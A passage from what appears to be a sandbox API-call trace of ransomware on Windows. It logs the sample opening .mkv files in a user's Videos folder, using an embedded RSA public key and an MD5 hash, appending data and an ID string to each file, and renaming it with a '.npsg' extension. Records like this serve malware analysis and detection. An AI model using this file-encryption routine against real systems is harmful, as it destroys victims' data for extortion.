ftLastWriteTime.dwHighDateTime=0x1d5b6a9, nFileSizeHigh=0x0, nFileSizeLow=0x13be0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e7FdbLkm_.mkv", cAlternateFileName="E7FDBL~1.MKV")) returned 1 [0238.602] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\e7FdbLkm_.mkv") returned=".mkv" [0238.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\e7FdbLkm_.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\e7fdblkm_.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.603] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=80864) returned 1 [0238.603] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.606] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13bba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.606] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.608] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x13be0, lpOverlapped=0x0) returned 1 [0238.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.609] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.610] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.610] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.610] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.610] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.610] GetLastError () returned 0x0 [0238.610] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.610] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.611] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.611] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.611] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.611] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.612] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13be0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.612] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.612] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.613] CloseHandle (hObject=0x644) returned 1 [0238.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.615] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\e7FdbLkm_.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\e7fdblkm_.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\e7FdbLkm_.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\e7fdblkm_.mkv.npsg")) returned 1 [0238.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.616] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.617] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x689977f0, ftCreationTime.dwHighDateTime=0x1d5bd4c, ftLastAccessTime.dwLowDateTime=0x8245c730, ftLastAccessTime.dwHighDateTime=0x1d5bea5, ftLastWriteTime.dwLowDateTime=0x8245c730, ftLastWriteTime.dwHighDateTime=0x1d5bea5, nFileSizeHigh=0x0, nFileSizeLow=0x1186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EaxApzFb8.mkv", cAlternateFileName="EAXAPZ~1.MKV")) returned 1 [0238.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e5f8 [0238.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.617] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\EaxApzFb8.mkv") returned=".mkv" [0238.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\EaxApzFb8.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\eaxapzfb8.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.618] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=4486) returned 1 [0238.618] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.621] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.621] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.623] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.623] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1186, lpOverlapped=0x0) returned 1 [0238.623] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.623] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.623] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.624] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.625] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.625] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.625] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.625] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.625] GetLastError () returned 0x0 [0238.625] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.625] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.625] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.625] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.625] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1190) returned 0x3b88cd0 [0238.626] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86000 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ae8 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86048 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b00 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.626] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b48 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400b30 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.628] GetCurrentThreadId () returned 0x5b4 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b871f8 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.628] GetCurrentThreadId () returned 0x5b4 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b48 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b18 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ba8 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b78 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b60 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bc0 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b60 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 